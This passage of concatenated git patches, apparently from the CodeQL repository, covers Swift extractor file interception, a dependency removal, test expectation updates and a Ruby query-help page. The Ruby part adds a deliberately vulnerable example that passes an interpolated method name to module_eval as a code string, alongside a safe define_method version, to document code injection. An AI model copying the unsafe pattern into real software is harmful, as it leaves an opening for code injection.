+} // namespace original + +bool endsWith(const std::string_view& s, const std::string_view& suffix) { + return s.size() >= suffix.size() && s.substr(s.size() - suffix.size()) == suffix; +} + +auto& fileInterceptorInstance() { + static std::weak_ptr ret{}; + return ret; +} + +bool mayBeRedirected(const char* path, int flags = O_RDONLY) { + return (!fileInterceptorInstance().expired() && (flags & O_ACCMODE) == O_RDONLY && + endsWith(path, ".swiftmodule")); +} + +} // namespace + +namespace codeql { + +class FileInterceptor { + public: + FileInterceptor(fs::path&& workingDir) : workingDir{std::move(workingDir)} { + fs::create_directories(hashesPath()); + fs::create_directories(storePath()); + } + + int open(const char* path, int flags, mode_t mode = 0) const { + fs::path fsPath{path}; + assert((flags & O_ACCMODE) == O_RDONLY); + errno = 0; + // first, try the same path underneath the artifact store + if (auto ret = original::open(redirectedPath(path).c_str(), flags); + ret >= 0 || errno != ENOENT) { + return ret; + } + errno = 0; + // then try to use the hash map + if (auto hashed = hashPath(path)) { + if (auto ret = original::open(hashed->c_str(), flags); ret >= 0 || errno != ENOENT) { + return ret; + } + } + return original::open(path, flags, mode); + } + + fs::path redirect(const fs::path& target) const { + assert(mayBeRedirected(target.c_str())); + auto ret = redirectedPath(target); + fs::create_directories(ret.parent_path()); + if (auto hashed = hashPath(target)) { + std::error_code ec; + fs::create_symlink(ret, *hashed, ec); + if (ec) { + std::cerr << "Cannot remap file " << ret << " -> " << *hashed << ": " << ec.message() + << "\n"; + } + } + return ret; + } + + private: + fs::path hashesPath() const { return workingDir / "hashes"; } + + fs::path storePath() const { return workingDir / "store"; } + + fs::path redirectedPath(const fs::path& target) const { + return storePath() / target.relative_path(); + } + + std::optional hashPath(const fs::path& target) const { + if (auto fd = original::open(target.c_str(), O_RDONLY | O_CLOEXEC); fd >= 0) { + return hashesPath() / hashFile(fd); + } + return std::nullopt; + } + + fs::path workingDir; +}; + +int openReal(const fs::path& path) { + return original::open(path.c_str(), O_RDONLY | O_CLOEXEC); +} + +fs::path redirect(const fs::path& target) { + if (auto interceptor = fileInterceptorInstance().lock()) { + return interceptor->redirect(target); + } else { + return target; + } +} + +std::shared_ptr setupFileInterception(fs::path workginDir) { + auto ret = std::make_shared(std::move(workginDir)); + fileInterceptorInstance() = ret; + return ret; +} +} // namespace codeql + +extern "C" { +int open(const char* path, int flags, ...) { + mode_t mode = 0; + if (flags & FILE_CREATION_MODE) { + va_list ap; + // mode only applies when creating a file + va_start(ap, flags); + mode = va_arg(ap, int); + va_end(ap); + } + + if (mayBeRedirected(path, flags)) { + if (auto interceptor = fileInterceptorInstance().lock()) { + return interceptor->open(path, flags, mode); + } + } + return original::open(path, flags, mode); +} + +} // namespace codeql diff --git a/swift/extractor/remapping/SwiftFileInterception.h b/swift/extractor/remapping/SwiftFileInterception.h new file mode 100644 index 00000000000..80a298d454f --- /dev/null +++ b/swift/extractor/remapping/SwiftFileInterception.h @@ -0,0 +1,19 @@ +#pragma once + +#include +#include +#include +#include + +#include "swift/extractor/infra/file/PathHash.h" + +namespace codeql { + +int openReal(const std::filesystem::path& path); + +class FileInterceptor; + +std::shared_ptr setupFileInterception(std::filesystem::path workingDir); + +std::filesystem::path redirect(const std::filesystem::path& target); +} // namespace codeql diff --git a/swift/extractor/remapping/SwiftOpenInterception.Linux.cpp b/swift/extractor/remapping/SwiftOpenInterception.Linux.cpp deleted file mode 100644 index 9304e027f0d..00000000000 --- a/swift/extractor/remapping/SwiftOpenInterception.Linux.cpp +++ /dev/null @@ -1,9 +0,0 @@ -#include "swift/extractor/remapping/SwiftOpenInterception.h" - -namespace codeql { -// TBD -void initRemapping(const std::filesystem::path& dir) {} -void finalizeRemapping( - const std::unordered_map& mapping) {} - -} // namespace codeql diff --git a/swift/extractor/remapping/SwiftOpenInterception.h b/swift/extractor/remapping/SwiftOpenInterception.h deleted file mode 100644 index e477e3996e1..00000000000 --- a/swift/extractor/remapping/SwiftOpenInterception.h +++ /dev/null @@ -1,15 +0,0 @@ -#pragma once - -#include -#include -#include - -#include "swift/extractor/infra/file/PathHash.h" - -namespace codeql { - -void initRemapping(const std::filesystem::path& dir); -void finalizeRemapping( - const std::unordered_map& mapping); - -} // namespace codeql diff --git a/swift/extractor/remapping/SwiftOpenInterception.macOS.cpp b/swift/extractor/remapping/SwiftOpenInterception.macOS.cpp deleted file mode 100644 index d378a571e58..00000000000 --- a/swift/extractor/remapping/SwiftOpenInterception.macOS.cpp +++ /dev/null @@ -1,85 +0,0 @@ -#include "swift/extractor/remapping/SwiftOpenInterception.h" - -#include - -#include -#include -#include - -#include "swift/extractor/infra/file/FileHash.h" - -namespace fs = std::filesystem; - -namespace codeql { - -static fs::path scratchDir; -static bool interceptionEnabled = false; - -static int (*original_open)(const char*, int, ...) = nullptr; - -static std::string originalHashFile(const fs::path& filename) { - int fd = original_open(filename.c_str(), O_RDONLY); - if (fd == -1) { - return {}; - } - - return hashFile(fd); -} - -static int codeql_open(const char* path, int oflag, ...) { - va_list ap; - mode_t mode = 0; - if ((oflag & O_CREAT) != 0) { - // mode only applies to O_CREAT - va_start(ap, oflag); - mode = va_arg(ap, int); - va_end(ap); - } - - fs::path newPath(path); - - if (interceptionEnabled && fs::exists(newPath)) { - // TODO: check file magic instead - if (newPath.extension() == ".swiftmodule") { - auto hash = originalHashFile(newPath); - auto hashed = scratchDir / hash; - if (!hash.empty() && fs::exists(hashed)) { - newPath = hashed; - } - } - } - - return original_open(newPath.c_str(), oflag, mode); -} - -void finalizeRemapping( - const std::unordered_map& mapping) { - for (auto& [original, patched] : mapping) { - // TODO: Check file magic instead - if (original.extension() != ".swiftmodule") { - continue; - } - auto hash = originalHashFile(original); - auto hashed = scratchDir / hash; - if (!hash.empty() && fs::exists(patched)) { - std::error_code ec; - fs::create_symlink(/* target */ patched, /* symlink */ hashed, ec); - if (ec) { - std::cerr << "Cannot remap file '" << patched << "' -> '" << hashed << "': " << ec.message() - << "\n"; - } - } - } - interceptionEnabled = false; -} - -void initRemapping(const std::filesystem::path& dir) { - scratchDir = dir; - - struct rebinding binding[] = { - {"open", reinterpret_cast(codeql_open), reinterpret_cast(&original_open)}}; - rebind_symbols(binding, 1); - interceptionEnabled = true; -} - -} // namespace codeql diff --git a/swift/extractor/remapping/SwiftOutputRewrite.cpp b/swift/extractor/remapping/SwiftOutputRewrite.cpp deleted file mode 100644 index 914a54d93f1..00000000000 --- a/swift/extractor/remapping/SwiftOutputRewrite.cpp +++ /dev/null @@ -1,137 +0,0 @@ -#include "swift/extractor/remapping/SwiftOutputRewrite.h" - -#include -#include -#include -#include -#include -#include -#include - -#include "swift/extractor/infra/file/PathHash.h" - -namespace fs = std::filesystem; - -namespace codeql { - -// Creates a copy of the output file map and updates remapping table in place -// It does not change the original map file as it is depended upon by the original compiler -// Returns path to the newly created output file map on success, or None in a case of failure -static std::optional rewriteOutputFileMap(const fs::path& scratchDir, - const fs::path& outputFileMapPath, - const std::vector& inputs, - PathRemapping& remapping) { - auto newMapPath = scratchDir / outputFileMapPath.relative_path(); - - // TODO: do not assume absolute path for the second parameter - auto outputMapOrError = swift::OutputFileMap::loadFromPath(outputFileMapPath.c_str(), ""); - if (!outputMapOrError) { - std::cerr << "Cannot load output map " << outputFileMapPath << "\n"; - return std::nullopt; - } - auto oldOutputMap = outputMapOrError.get(); - swift::OutputFileMap newOutputMap; - std::vector keys; - for (auto& key : inputs) { - auto oldMap = oldOutputMap.getOutputMapForInput(key.c_str()); - if (!oldMap) { - continue; - } - keys.push_back(key.c_str()); - auto& newMap = newOutputMap.getOrCreateOutputMapForInput(key.c_str()); - newMap.copyFrom(*oldMap); - for (auto& entry : newMap) { - fs::path oldPath = entry.getSecond(); - auto newPath = scratchDir / oldPath.relative_path(); - entry.getSecond() = newPath; - remapping[oldPath] = newPath; - } - } - std::error_code ec; - fs::create_directories(newMapPath.parent_path(), ec); - if (ec) { - std::cerr << "Cannot create relocated output map dir " << newMapPath.parent_path() << ": " - << ec.message() << "\n"; - return std::nullopt; - } - - llvm::raw_fd_ostream fd(newMapPath.c_str(), ec, llvm::sys::fs::OF_None); - newOutputMap.write(fd, keys); - return newMapPath; -} - -PathRemapping rewriteOutputsInPlace(const fs::path& scratchDir, std::vector& CLIArgs) { - PathRemapping remapping; - - // TODO: handle filelists? - const std::unordered_set pathRewriteOptions({ - "-emit-abi-descriptor-path", - "-emit-dependencies-path", - "-emit-module-path", - "-emit-module-doc-path", - "-emit-module-source-info-path", - "-emit-objc-header-path", - "-emit-reference-dependencies-path", - "-index-store-path", - "-index-unit-output-path", - "-module-cache-path", - "-o", - "-pch-output-dir", - "-serialize-diagnostics-path", - }); - - std::unordered_set outputFileMaps( - {"-supplementary-output-file-map", "-output-file-map"}); - - std::vector outputFileMapIndexes; - std::vector maybeInput; - std::string targetTriple; - - std::vector newLocations; - for (size_t i = 0; i < CLIArgs.size(); i++) { - if (pathRewriteOptions.count(CLIArgs[i])) { - fs::path oldPath = CLIArgs[i + 1]; - auto newPath = scratchDir / oldPath.relative_path(); - CLIArgs[++i] = newPath.string(); - newLocations.push_back(newPath); - - remapping[oldPath] = newPath; - } else if (outputFileMaps.count(CLIArgs[i])) { - // collect output map indexes for further rewriting and skip the following argument - // We don't patch the map in place as we need to collect all the input files first - outputFileMapIndexes.push_back(++i); - } else if (CLIArgs[i] == "-target") { - targetTriple = CLIArgs[++i]; - } else if (CLIArgs[i][0] != '-') { - // TODO: add support for input file lists? - // We need to collect input file names to later use them to extract information from the - // output file maps. - maybeInput.push_back(CLIArgs[i]); - } - } - - for (auto index : outputFileMapIndexes) { - auto oldPath = CLIArgs[index]; - auto maybeNewPath = rewriteOutputFileMap(scratchDir, oldPath, maybeInput, remapping); - if (maybeNewPath) { - const auto& newPath = maybeNewPath.value(); - CLIArgs[index] = newPath; - remapping[oldPath] = newPath; - } - } - - return remapping; -} - -void ensureDirectoriesForNewPathsExist(const PathRemapping& remapping) { - for (auto& [_, newPath] : remapping) { - std::error_code ec; - fs::create_directories(newPath.parent_path(), ec); - if (ec) { - std::cerr << "Cannot create redirected directory " << newPath.parent_path() << ": " - << ec.message() << "\n"; - } - } -} - -} // namespace codeql diff --git a/swift/extractor/remapping/SwiftOutputRewrite.h b/swift/extractor/remapping/SwiftOutputRewrite.h deleted file mode 100644 index 27d135aa8cf..00000000000 --- a/swift/extractor/remapping/SwiftOutputRewrite.h +++ /dev/null @@ -1,21 +0,0 @@ -#pragma once - -#include -#include -#include -#include "swift/extractor/infra/file/PathHash.h" - -namespace codeql { - -using PathRemapping = std::unordered_map; -// Rewrites all the output CLI args to point to a scratch dir instead of the actual locations. -// This is needed to ensure that the artifacts produced by the extractor do not collide with the -// artifacts produced by the actual Swift compiler. -// Returns the map containing remapping oldpath -> newPath. -PathRemapping rewriteOutputsInPlace(const std::filesystem::path& scratchDir, - std::vector& CLIArgs); - -// Create directories for all the redirected new paths as the Swift compiler expects them to exist. -void ensureDirectoriesForNewPathsExist(const PathRemapping& remapping); - -} // namespace codeql diff --git a/swift/integration-tests/posix-only/frontend-invocations/F1.swift b/swift/integration-tests/posix-only/frontend-invocations/F1.swift index e69de29bb2d..d29f0705072 100644 --- a/swift/integration-tests/posix-only/frontend-invocations/F1.swift +++ b/swift/integration-tests/posix-only/frontend-invocations/F1.swift @@ -0,0 +1 @@ +func foo() {} diff --git a/swift/integration-tests/posix-only/frontend-invocations/F2.swift b/swift/integration-tests/posix-only/frontend-invocations/F2.swift index e69de29bb2d..68497daef9d 100644 --- a/swift/integration-tests/posix-only/frontend-invocations/F2.swift +++ b/swift/integration-tests/posix-only/frontend-invocations/F2.swift @@ -0,0 +1 @@ +func bar() {} diff --git a/swift/integration-tests/posix-only/frontend-invocations/build.sh b/swift/integration-tests/posix-only/frontend-invocations/build.sh index 03f1148ca05..12a51efed78 100755 --- a/swift/integration-tests/posix-only/frontend-invocations/build.sh +++ b/swift/integration-tests/posix-only/frontend-invocations/build.sh @@ -15,4 +15,4 @@ $FRONTEND -frontend -c -primary-file D.swift -o D.o $SDK $FRONTEND -frontend -c -primary-file E.swift Esup.swift -o E.o $SDK $FRONTEND -frontend -emit-module -primary-file F1.swift F2.swift -module-name F -o F1.swiftmodule $SDK $FRONTEND -frontend -emit-module F1.swift -primary-file F2.swift -module-name F -o F2.swiftmodule $SDK -$FRONTEND -merge-modules F1.swiftmodule F2.swiftmodule -o F.swiftmodule $SDK +$FRONTEND -frontend -merge-modules F1.swiftmodule F2.swiftmodule -o F.swiftmodule $SDK From d35c5e90ee5fe6b83d72991fdfba9d1f1b1f82a4 Mon Sep 17 00:00:00 2001 From: Paolo Tranquilli Date: Thu, 8 Dec 2022 11:07:14 +0100 Subject: [PATCH 032/381] Swift: remove fishhook --- swift/third_party/fishhook/BUILD.bazel | 0 swift/third_party/fishhook/BUILD.fishhook.bazel | 7 ------- swift/third_party/load.bzl | 8 -------- 3 files changed, 15 deletions(-) delete mode 100644 swift/third_party/fishhook/BUILD.bazel delete mode 100644 swift/third_party/fishhook/BUILD.fishhook.bazel diff --git a/swift/third_party/fishhook/BUILD.bazel b/swift/third_party/fishhook/BUILD.bazel deleted file mode 100644 index e69de29bb2d..00000000000 diff --git a/swift/third_party/fishhook/BUILD.fishhook.bazel b/swift/third_party/fishhook/BUILD.fishhook.bazel deleted file mode 100644 index 5919f608d65..00000000000 --- a/swift/third_party/fishhook/BUILD.fishhook.bazel +++ /dev/null @@ -1,7 +0,0 @@ -cc_library( - name = "fishhook", - srcs = glob(["*.c"]), - hdrs = glob(["*.h"]), - strip_include_prefix = ".", - visibility = ["//visibility:public"], -) diff --git a/swift/third_party/load.bzl b/swift/third_party/load.bzl index fbd98b6aedb..2e1fd25ef23 100644 --- a/swift/third_party/load.bzl +++ b/swift/third_party/load.bzl @@ -38,14 +38,6 @@ def load_dependencies(repository_name): ], ) - http_archive( - name = "fishhook", - url = "https://github.com/facebook/fishhook/archive/aadc161ac3b80db07a9908851839a17ba63a9eb1.zip", - build_file = "@%s//swift/third_party/fishhook:BUILD.fishhook.bazel" % repository_name, - strip_prefix = "fishhook-aadc161ac3b80db07a9908851839a17ba63a9eb1", - sha256 = "9f2cdee6dcc2039d4c47d25ab5141fe0678ce6ed27ef482cab17fe9fa38a30ce", - ) - http_archive( name = "picosha2", url = "https://github.com/okdshin/PicoSHA2/archive/27fcf6979298949e8a462e16d09a0351c18fcaf2.zip", From 26ae8f177b853565fc7accefb9f83cd3b2ae7e9d Mon Sep 17 00:00:00 2001 From: Paolo Tranquilli Date: Thu, 8 Dec 2022 14:39:28 +0100 Subject: [PATCH 033/381] Swift: accept test changes Downgrading the emit object action to a type check one has some unexpected side effects, that seem however acceptable: * experimental false static assertions do not make compilation fail in type check mode * the implicit module loading of `SwiftOnoneSupport` is not happening. That module contains some "pre-specializations", it does not seem really relevant for analysis --- .../generated/decl/ModuleDecl/ModuleDecl.expected | 4 ++-- .../decl/ModuleDecl/ModuleDecl_getImportedModule.expected | 2 -- .../generated/stmt/PoundAssertStmt/PoundAssertStmt.expected | 2 +- .../stmt/PoundAssertStmt/static_failing_assert.swift | 1 - 4 files changed, 3 insertions(+), 6 deletions(-) diff --git a/swift/ql/test/extractor-tests/generated/decl/ModuleDecl/ModuleDecl.expected b/swift/ql/test/extractor-tests/generated/decl/ModuleDecl/ModuleDecl.expected index e73a1739f4c..9f63f229ab3 100644 --- a/swift/ql/test/extractor-tests/generated/decl/ModuleDecl/ModuleDecl.expected +++ b/swift/ql/test/extractor-tests/generated/decl/ModuleDecl/ModuleDecl.expected @@ -1,3 +1,3 @@ -| file://:0:0:0:0 | Foo | getModule: | file://:0:0:0:0 | Foo | getInterfaceType: | module | getName: | Foo | getNumberOfBaseTypes: | 0 | isBuiltinModule: | no | isSystemModule: | no | getNumberOfImportedModules: | 4 | getNumberOfExportedModules: | 1 | +| file://:0:0:0:0 | Foo | getModule: | file://:0:0:0:0 | Foo | getInterfaceType: | module | getName: | Foo | getNumberOfBaseTypes: | 0 | isBuiltinModule: | no | isSystemModule: | no | getNumberOfImportedModules: | 3 | getNumberOfExportedModules: | 1 | | file://:0:0:0:0 | __ObjC | getModule: | file://:0:0:0:0 | __ObjC | getInterfaceType: | module<__ObjC> | getName: | __ObjC | getNumberOfBaseTypes: | 0 | isBuiltinModule: | no | isSystemModule: | no | getNumberOfImportedModules: | 1 | getNumberOfExportedModules: | 0 | -| file://:0:0:0:0 | default_module_name | getModule: | file://:0:0:0:0 | default_module_name | getInterfaceType: | module | getName: | default_module_name | getNumberOfBaseTypes: | 0 | isBuiltinModule: | no | isSystemModule: | no | getNumberOfImportedModules: | 4 | getNumberOfExportedModules: | 0 | +| file://:0:0:0:0 | default_module_name | getModule: | file://:0:0:0:0 | default_module_name | getInterfaceType: | module | getName: | default_module_name | getNumberOfBaseTypes: | 0 | isBuiltinModule: | no | isSystemModule: | no | getNumberOfImportedModules: | 3 | getNumberOfExportedModules: | 0 | diff --git a/swift/ql/test/extractor-tests/generated/decl/ModuleDecl/ModuleDecl_getImportedModule.expected b/swift/ql/test/extractor-tests/generated/decl/ModuleDecl/ModuleDecl_getImportedModule.expected index ca1793b95ef..aaae8dfa5cc 100644 --- a/swift/ql/test/extractor-tests/generated/decl/ModuleDecl/ModuleDecl_getImportedModule.expected +++ b/swift/ql/test/extractor-tests/generated/decl/ModuleDecl/ModuleDecl_getImportedModule.expected @@ -1,9 +1,7 @@ | file://:0:0:0:0 | Foo | 0 | file://:0:0:0:0 | Swift | | file://:0:0:0:0 | Foo | 1 | file://:0:0:0:0 | _StringProcessing | | file://:0:0:0:0 | Foo | 2 | file://:0:0:0:0 | _Concurrency | -| file://:0:0:0:0 | Foo | 3 | file://:0:0:0:0 | SwiftOnoneSupport | | file://:0:0:0:0 | __ObjC | 0 | file://:0:0:0:0 | Swift | | file://:0:0:0:0 | default_module_name | 0 | file://:0:0:0:0 | Swift | | file://:0:0:0:0 | default_module_name | 1 | file://:0:0:0:0 | _StringProcessing | | file://:0:0:0:0 | default_module_name | 2 | file://:0:0:0:0 | _Concurrency | -| file://:0:0:0:0 | default_module_name | 3 | file://:0:0:0:0 | SwiftOnoneSupport | diff --git a/swift/ql/test/extractor-tests/generated/stmt/PoundAssertStmt/PoundAssertStmt.expected b/swift/ql/test/extractor-tests/generated/stmt/PoundAssertStmt/PoundAssertStmt.expected index d8ba1130d6f..f157a17ca2e 100644 --- a/swift/ql/test/extractor-tests/generated/stmt/PoundAssertStmt/PoundAssertStmt.expected +++ b/swift/ql/test/extractor-tests/generated/stmt/PoundAssertStmt/PoundAssertStmt.expected @@ -1,3 +1,3 @@ | static_assert.swift:2:1:2:15 | #assert ... | getCondition: | static_assert.swift:2:9:2:14 | ... .==(_:_:) ... | getMessage: | | | static_assert.swift:3:1:3:24 | #assert ... | getCondition: | static_assert.swift:3:9:3:14 | ... .!=(_:_:) ... | getMessage: | hello | -| static_failing_assert.swift:4:1:4:24 | #assert ... | getCondition: | static_failing_assert.swift:4:9:4:14 | ... .==(_:_:) ... | getMessage: | oh my | +| static_failing_assert.swift:3:1:3:24 | #assert ... | getCondition: | static_failing_assert.swift:3:9:3:14 | ... .==(_:_:) ... | getMessage: | oh my | diff --git a/swift/ql/test/extractor-tests/generated/stmt/PoundAssertStmt/static_failing_assert.swift b/swift/ql/test/extractor-tests/generated/stmt/PoundAssertStmt/static_failing_assert.swift index 2873c0c04b6..bf9bd80f780 100644 --- a/swift/ql/test/extractor-tests/generated/stmt/PoundAssertStmt/static_failing_assert.swift +++ b/swift/ql/test/extractor-tests/generated/stmt/PoundAssertStmt/static_failing_assert.swift @@ -1,4 +1,3 @@ //codeql-extractor-options: -enable-experimental-static-assert -//codeql-extractor-expected-status: 1 #assert(1 == 0, "oh my") From 71626926562130a37b1d4c305cba127e16a1d8dc Mon Sep 17 00:00:00 2001 From: Paolo Tranquilli Date: Fri, 9 Dec 2022 10:00:01 +0100 Subject: [PATCH 034/381] Swift: exit directly on actions not requiring extraction --- swift/extractor/main.cpp | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/swift/extractor/main.cpp b/swift/extractor/main.cpp index fff97ba9f51..e86ce4f88a9 100644 --- a/swift/extractor/main.cpp +++ b/swift/extractor/main.cpp @@ -30,7 +30,7 @@ static void lockOutputSwiftModuleTraps(const codeql::SwiftExtractorConfiguration } } -static void modifyFrontendOptions(swift::FrontendOptions& options) { +static void processFrontendOptions(swift::FrontendOptions& options) { using Action = swift::FrontendOptions::ActionType; switch (options.RequestedAction) { case Action::EmitModuleOnly: @@ -58,9 +58,9 @@ static void modifyFrontendOptions(swift::FrontendOptions& options) { // version printing is used by CI to match up the correct compiler version return; default: - // otherwise, do nothing (the closest action to doing nothing is printing the version) - options.RequestedAction = Action::PrintVersion; - break; + // otherwise, we have nothing to do + std::cerr << "Frontend action requires no action from extractor, exiting\n"; + std::exit(0); } } @@ -74,7 +74,7 @@ class Observer : public swift::FrontendObserver { : config{config}, diagConsumer{diagConsumer} {} void parsedArgs(swift::CompilerInvocation& invocation) override { - modifyFrontendOptions(invocation.getFrontendOptions()); + processFrontendOptions(invocation.getFrontendOptions()); } void configuredCompiler(swift::CompilerInstance& instance) override { From d95a4a7bafc2ea4fc0ac8195c9bf890285821842 Mon Sep 17 00:00:00 2001 From: erik-krogh Date: Tue, 13 Dec 2022 19:33:45 +0100 Subject: [PATCH 035/381] add a second example of how to use module_eval without constructing a code-string --- .../cwe-094/UnsafeCodeConstruction.qhelp | 27 +++++++++++++++++-- .../examples/UnsafeCodeConstruction2.rb | 17 ++++++++++++ .../examples/UnsafeCodeConstruction2Safe.rb | 13 +++++++++ 3 files changed, 55 insertions(+), 2 deletions(-) create mode 100644 ruby/ql/src/queries/security/cwe-094/examples/UnsafeCodeConstruction2.rb create mode 100644 ruby/ql/src/queries/security/cwe-094/examples/UnsafeCodeConstruction2Safe.rb diff --git a/ruby/ql/src/queries/security/cwe-094/UnsafeCodeConstruction.qhelp b/ruby/ql/src/queries/security/cwe-094/UnsafeCodeConstruction.qhelp index c430259b029..34227b85539 100644 --- a/ruby/ql/src/queries/security/cwe-094/UnsafeCodeConstruction.qhelp +++ b/ruby/ql/src/queries/security/cwe-094/UnsafeCodeConstruction.qhelp @@ -25,7 +25,7 @@ inputs, or avoid constructing code in the first place.

    -The following example shows two methods implemented using `eval`: a simple +The following example shows two methods implemented using eval: a simple deserialization routine and a getter method. If untrusted inputs are used with these methods, then an attacker might be able to execute arbitrary code on the system. @@ -35,7 +35,7 @@ then an attacker might be able to execute arbitrary code on the system.

    To avoid this problem, either properly document that the function is potentially -unsafe, or use an alternative solution such as `JSON.parse` or another library, like in the examples below, +unsafe, or use an alternative solution such as JSON.parse or another library, like in the examples below, that does not allow arbitrary code to be executed.

    @@ -43,6 +43,29 @@ that does not allow arbitrary code to be executed.     + +

    +As another example, consider the below code which dynamically constructs +a class that has a getter method with a custom name. +

    + + + +

    +The example dynamically constructs a string which is then executed using module_eval. +This code will break if the specified name is not a valid Ruby identifier, and +if the value is controlled by an attacker, then this could lead to code injection. +

    + +

    +A more robust implementation, that is also immune to code injection, +can be made by using module_eval with a block and using define_method +to define the getter method. +

    + + +     +
  • OWASP: diff --git a/ruby/ql/src/queries/security/cwe-094/examples/UnsafeCodeConstruction2.rb b/ruby/ql/src/queries/security/cwe-094/examples/UnsafeCodeConstruction2.rb new file mode 100644 index 00000000000..3452dfab665 --- /dev/null +++ b/ruby/ql/src/queries/security/cwe-094/examples/UnsafeCodeConstruction2.rb @@ -0,0 +1,17 @@ +require 'json' + +module BadMakeGetter + # Makes a class with a method named `getter_name` that returns `val` + def self.define_getter_class(getter_name, val) + new_class = Class.new + new_class.module_eval <<-END + def #{getter_name} + #{JSON.dump(val)} + end + END + new_class + end +end + +one = BadMakeGetter.define_getter_class(:one, "foo") +puts "One is #{one.new.one}" \ No newline at end of file diff --git a/ruby/ql/src/queries/security/cwe-094/examples/UnsafeCodeConstruction2Safe.rb b/ruby/ql/src/queries/security/cwe-094/examples/UnsafeCodeConstruction2Safe.rb new file mode 100644 index 00000000000..6c64684b183 --- /dev/null +++ b/ruby/ql/src/queries/security/cwe-094/examples/UnsafeCodeConstruction2Safe.rb @@ -0,0 +1,13 @@ +# Uses `define_method` instead of constructing a string +module GoodMakeGetter + def self.define_getter_class(getter_name, val) + new_class = Class.new + new_class.module_eval do + define_method(getter_name) { val } + end + new_class + end +end + +two = GoodMakeGetter.define_getter_class(:two, "bar") +puts "Two is #{two.new.two}" From 4ec401a3f6d9bcd4976dc34779168af83c2544a5 Mon Sep 17 00:00:00 2001 From: turbo Date: Wed, 14 Dec 2022 17:15:50 +0100 Subject: [PATCH 036/381] Tag all security queries in supported languages' experimental directories with an experimental tag --- .../src/experimental/Likely Bugs/ArrayAccessProductFlow.ql | 1 + .../src/experimental/Likely Bugs/OverrunWriteProductFlow.ql | 1 + .../src/experimental/Likely Bugs/RedundantNullCheckParam.ql | 1 + .../Security/CWE/CWE-020/LateCheckOfFunctionArgument.ql | 1 + .../Security/CWE/CWE-020/NoCheckBeforeUnsafePutUser.ql | 1 + .../src/experimental/Security/CWE/CWE-078/WordexpTainted.ql | 1 + .../Security/CWE/CWE-1041/FindWrapperFunctions.ql | 1 + .../DeclarationOfVariableWithUnnecessarilyWideScope.ql | 1 + .../Security/CWE/CWE-120/MemoryUnsafeFunctionScan.ql | 1 + .../CWE-125/DangerousWorksWithMultibyteOrWideCharacters.ql | 1 + .../Security/CWE/CWE-190/AllocMultiplicationOverflow.ql | 1 + .../CWE-190/DangerousUseOfTransformationAfterOperation.ql | 1 + .../Security/CWE/CWE-193/ConstantSizeArrayOffByOne.ql | 1 + .../experimental/Security/CWE/CWE-193/InvalidPointerDeref.ql | 1 + .../CWE-200/ExposureSensitiveInformationUnauthorizedActor.ql | 1 + .../CWE/CWE-243/IncorrectChangingWorkingDirectory.ql | 1 + .../Security/CWE/CWE-266/IncorrectPrivilegeAssignment.ql | 1 + .../Security/CWE/CWE-273/PrivilegeDroppingOutoforder.ql | 1 + .../experimental/Security/CWE/CWE-285/PamAuthorization.ql | 1 + .../Security/CWE/CWE-359/PrivateCleartextWrite.ql | 1 + cpp/ql/src/experimental/Security/CWE/CWE-362/double-fetch.ql | 1 + .../Security/CWE/CWE-377/InsecureTemporaryFile.ql | 1 + .../Security/CWE/CWE-401/MemoryLeakOnFailedCallToRealloc.ql | 1 + cpp/ql/src/experimental/Security/CWE/CWE-415/DoubleFree.ql | 1 + .../Security/CWE/CWE-476/DangerousUseOfExceptionBlocks.ql | 1 + .../Security/CWE/CWE-561/FindIncorrectlyUsedSwitch.ql | 1 + .../Security/CWE/CWE-670/DangerousUseSSL_shutdown.ql | 1 + .../src/experimental/Security/CWE/CWE-675/DoubleRelease.ql | 1 + ...sufficientControlFlowManagementAfterRefactoringTheCode.ql | 1 + ...nsufficientControlFlowManagementWhenUsingBitOperations.ql | 1 + .../Security/CWE/CWE-703/FindIncorrectlyUsedExceptions.ql | 1 + .../Security/CWE/CWE-754/ImproperCheckReturnValueScanf.ql | 1 + .../CWE/CWE-758/UndefinedOrImplementationDefinedBehavior.ql | 1 + ...rPrecedenceLogicErrorWhenUseBitwiseOrLogicalOperations.ql | 1 + .../CWE-783/OperatorPrecedenceLogicErrorWhenUseBoolType.ql | 1 + .../Security/CWE/CWE-787/UnsignedToSignedPointerArith.ql | 1 + .../AccessOfMemoryLocationAfterEndOfBufferUsingStrlen.ql | 1 + csharp/ql/src/experimental/CWE-099/TaintedWebClient.ql | 1 + csharp/ql/src/experimental/CWE-918/RequestForgery.ql | 1 + .../Security Features/CWE-1004/CookieWithoutHttpOnly.ql | 1 + .../Azure/UnsafeUsageOfClientSideEncryptionVersion.ql | 1 + .../Security Features/CWE-614/CookieWithoutSecure.ql | 1 + .../Security Features/CWE-759/HashWithoutSalt.ql | 1 + .../delegated-security-validations-always-return-true.ql | 1 + .../JsonWebTokenHandler/security-validation-disabled.ql | 1 + .../Serialization/DefiningDatasetRelatedType.ql | 1 + .../Serialization/DefiningPotentiallyUnsafeXmlSerializer.ql | 1 + .../Serialization/UnsafeTypeUsedDataContractSerializer.ql | 1 + .../Serialization/XmlDeserializationWithDataSet.ql | 1 + .../backdoor/DangerousNativeFunctionCall.ql | 1 + .../Security Features/backdoor/PotentialTimeBomb.ql | 1 + .../Security Features/backdoor/ProcessNameToHashTaintFlow.ql | 1 + go/ql/src/experimental/CWE-090/LDAPInjection.ql | 1 + go/ql/src/experimental/CWE-1004/CookieWithoutHttpOnly.ql | 1 + go/ql/src/experimental/CWE-285/PamAuthBypass.ql | 1 + go/ql/src/experimental/CWE-321/HardcodedKeys.ql | 1 + go/ql/src/experimental/CWE-327/WeakCryptoAlgorithm.ql | 5 +++-- go/ql/src/experimental/CWE-369/DivideByZero.ql | 1 + go/ql/src/experimental/CWE-400/DatabaseCallInLoop.ql | 2 ++ .../experimental/CWE-79/HTMLTemplateEscapingPassthrough.ql | 1 + go/ql/src/experimental/CWE-807/SensitiveConditionBypass.ql | 2 ++ go/ql/src/experimental/CWE-840/ConditionalBypass.ql | 2 ++ go/ql/src/experimental/CWE-918/SSRF.ql | 1 + go/ql/src/experimental/CWE-942/CorsMisconfiguration.ql | 1 + go/ql/src/experimental/Unsafe/WrongUsageOfUnsafe.ql | 1 + .../Security/CWE/CWE-016/InsecureSpringActuatorConfig.ql | 1 + .../experimental/Security/CWE/CWE-016/SpringBootActuators.ql | 1 + .../experimental/Security/CWE/CWE-020/Log4jJndiInjection.ql | 1 + java/ql/src/experimental/Security/CWE/CWE-036/OpenStream.ql | 1 + .../experimental/Security/CWE/CWE-073/FilePathInjection.ql | 1 + java/ql/src/experimental/Security/CWE/CWE-078/ExecTainted.ql | 1 + 